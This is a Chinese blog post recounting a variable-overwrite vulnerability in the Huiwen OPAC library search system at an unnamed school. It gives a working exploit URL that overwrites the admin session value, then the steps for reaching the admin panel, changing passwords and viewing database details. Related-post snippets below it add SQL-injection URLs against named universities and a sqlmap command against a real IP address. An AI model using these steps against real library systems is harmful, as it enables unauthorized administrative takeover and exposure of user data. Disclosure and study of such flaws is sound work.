记一次无意间发现某学校图书检索系统的变量覆盖漏洞

已于 2022-08-30 16:26:05 修改
阅读量2.3k 收藏
点赞数
分类专栏: # day 文章标签: php
于 2021-10-01 09:34:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_50854662/article/details/120575512
版权

这是汇文OPAC很早就存在的一个严重漏洞

补充漏洞信息参考来源https://www.seebug.org/vuldb/ssvid-90722

1. 利用存在该漏洞参数的链接,访问存在漏洞文件,并覆盖 session 值

http://*******/opac/openlink_ebk.php?_SESSION[ADMIN_USER]=opac_admin

2.直接访问后台地址

http://********/admin/cfg_basic.php
在这里插入图片描述

3.后台可直接修改密码

在这里插入图片描述
数据库信息
在这里插入图片描述

4.总结

系统不更新的危害太大了,变量覆盖在此处的危害及其严重。

zxl2605
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
高校图书馆管理系统 php 漏洞,江苏汇文Libsys图书馆管理系统几处通用SQL注入漏洞...
weixin_35486751的博客
04-05 443
江苏汇文Libsys图书馆管理系统几处通用SQL注入漏洞涉及几十家高校和其他用户 这种通用漏洞存在于 Libsys图书馆管理系统 v3.5 目前有几十家高校在使用http://opac.bgu.edu.cn/opac/item.php?marc_no=0000059842 北京吉利大学http://lib.math.ac.cn:8080/opac/item.php?marc_no=00000188...
高校图书馆管理系统 php 漏洞,某通用图书馆管理系统SQL注入_MySQL
weixin_39761422的博客
04-05 367
某通用图书馆管理系统SQL注入,主要是某个某页面存在SQL注射。sqlmap.py -u http://219.242.65.10/fsweb/MakeIntert.aspx?ID=123 --is-dbasqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GET...
高校图书馆管理系统 php 漏洞,Libsys图书管理系统 V5.5 变量覆盖漏洞
weixin_34191685的博客
04-05 745
### 登陆页面```session_start( );if ( isset( $_REQUEST['username'] ) ){$strUser = trim( $_REQUEST['username'] );$strInput = trim( $_REQUEST['passwd'] );$strMsg = "用户名或者密码错误";switch ( $strUser ){case "opac_...
渗透图书馆——金盘馆藏查询系统
qq_41703976的博客
12-27 1168
某次偶然访问某校图书馆 进入馆藏书目查询 发现在页面上方出现报错 但奇怪的是,再次刷新页面或者重新打开页面,这个报错就消失了 好在截了图,根据报错信息,可以断定使用的Oracle数据库 在这个页面尝试了一下1和1’ and ‘1’=1 没什么收获 可能不存在SQL注入吧。。。。 于是输入1,点击“开始检索”按钮,进入二级检索页面 跳转到如下页面 尝试1’ 出现报错信息 本来打算进行联合注入的,发现网站上装了主机卫士,会拦截我...
KUKA系统变量编程指导(全集+中文解释).pdf
12-30
在使用和修改系统变量时,需要遵守安全注意事项,例如,避免无意的修改,避免对机器人的安全和稳定性产生影响。同时,需要遵守手册中的安全章节的内容,以确保机器人的安全和可靠性。 5. 系统变量的应用 系统变量...
C语言图书管理系统课程设计
01-20
这是本人大一第二学期初C语言课程设计的作品,嘿嘿,本来以为已经找不到原稿了,今天无意中竟然在QQ网络硬盘中找到了当初的teta版,发布于此,以作纪念。 C 源代码如下: #include #include #include struct book{ ...
基于MFC的图书管理系统
06-14
设计大思路:设计图书管理系统,采用了数据结构的思想,将整个图书管理系统看做线性表,使用顺序存储,存储不同图书信息的图书类对象是线性表的元素,用数组存储线性表,本系统定义对象数组集合类CObArray m_...
基于python图书馆管理系统设计实例详解
12-17
这个项目不是我的作业, 只是无意中被拉进来了,然后就承担了所有,肝了一周多,终于完成,但这个也算是一个很大的项目了吧,对于我现在来说,写这个项目遇到了很多困难,这是真的,其中涉及到数据库的使用,就遇到...
数据库无意间被删除,如何恢复数据docx.docx
03-31
mysql数据库被删除,没有增量备份的辅助,只有每天的备份情况下的数据库的恢复。 mysqlbinlog的方式。
libFan:汇文图书馆系统Chrome便捷扩展
06-07
书迷 汇文 OPAC 系统第三方 Chrome 扩展程序,可以更方便地检索图书馆资源和检查到期图书。 基于 重构,适用于汇文 OPAC 系统 V4.5 和 V5.0。 更详细的介绍请阅读 安装扩展 本程序暂未发布到扩展商店,请使用开发者模式导入源代码: 在地址栏中输入 chrome://extensions 勾选“开发者模式” 将文件夹拖入即可安装。 许可证 本软件遵循 MIT 许可证发布。
汇文opac的openlink.php改造
fundawang的博客
01-12 903
汇文文献系统OPAC 5.6引入了新的全文检索引擎,但是在marc详情页面显示的内容中,链接到的其他检索结果仍然指向openlink.php。这个文件会进行大量基于数据库的检索操作,对于数据库来说是非常大的连接消耗。 为此应该将openlink.php进行重构,将其引流到全文检索引擎,而不是传统检索引擎中。 <?php if(isset($_GET['title'])) { ...
【1day】金和OA某接口存在未授权访问漏洞
最新发布
记录并分享学习安全的知识点..
12-07 788
软件,旨在提供高效的办公流程管理和协作解决方案。它提供了一系列功能和工具,帮助企业实现办公自动化、信息共享和团队协作。金和OA存在未授权访问漏洞,攻击者可以通过某种方式绕过身份验证机制,直接访问应用程序或系统的敏感资源或功能,从而获取敏感信息或进行恶意操作的一种漏洞。金和OA是一款企业级。
uml图书管理系统报告_关于修改部分读者登录图书馆管理系统密码的通知
weixin_39791225的博客
11-25 252
关于修改部分读者登录图书馆管理系统密码的通知各位读者:大家好!接到学校信息办关于图书馆管理系统OPAC漏洞报告通知,我馆部分读者的密码和用户名一致,存在读者信息泄露的极大风险。由于情况紧急,学校已关闭外网访问图书OPAC页面的权限。为此,图书馆将对这部分读者登录密码做如下处理:1.由软件工程师对这部分读者的图书馆登录密码进行统一修改;2.如读者发现无法登录图书馆管理系统时,请致电图书馆...
最新系统漏洞--UnRAR堆缓冲区溢出漏洞
weixin_48555088的博客
12-15 461
最新系统漏洞2021年12月13日 受影响系统: UnRAR UnRAR 5.6.1.3 UnRAR UnRAR 5.6.1.2 描述: UnRAR是一个可解压rar后缀文件的命令。 UnRAR 5.6.1.2版本和5.6.1.3版本的Unpack::CopyString存在堆缓冲区溢出漏洞。攻击者可利用该漏导致堆缓冲区溢出。 <**> 建议: 厂商补丁: UnRAR 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: https://github.com/aawc/unrar/
SCANV团队预警libsys图书馆系统注入漏洞
爱尖刀科技媒体 - 曲子龙
12-10 889
近日,SCANV团队监测到一个libsys图书馆系统的注入漏洞。该漏洞可使黑客获取到数据库信息,恶意篡改数据,甚至造成“拖库”等危害。SCANV团队预警站长关注此漏洞。 libsys是江苏汇文软件公司推出的一款基于B/S架构的图书馆自动化系统,主要服务于国内各大院校的图书馆,国内42%的“211工程大学”和诸多的“985工程大学”均采用了libsys图书馆管理系统。 SCANV
正方教务管理系统漏洞
07-27
回答: 正方教务管理系统最近爆出了一个高危漏洞,攻击者可以利用该漏洞轻易获取网站webshell权限。\[1\]具体的漏洞情况和修复方法没有提供,但可以看出该漏洞可能与系统的前端和后端交互过程有关。\[2\]此外,还有用户在写教务系统查成绩的爬虫过程中发现了一个重要的参数"gnmkdm",该参数似乎控制了权限和页面标题的显示。\[3\]这些信息表明正方教务管理系统存在安全漏洞,需要及时修复以保护用户数据的安全。 #### 引用[.reference_title] - *1* [正方高校教务管理系统漏洞修复](https://blog.csdn.net/fengling132/article/details/7667951)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [2021-08-16一次无意发现正方教务系统的bug](https://blog.csdn.net/qq_43548154/article/details/119722784)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [关于新正方教务系统(湖北工程学院)的one day越权漏洞的说明](https://blog.csdn.net/qq_30347475/article/details/128370854)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值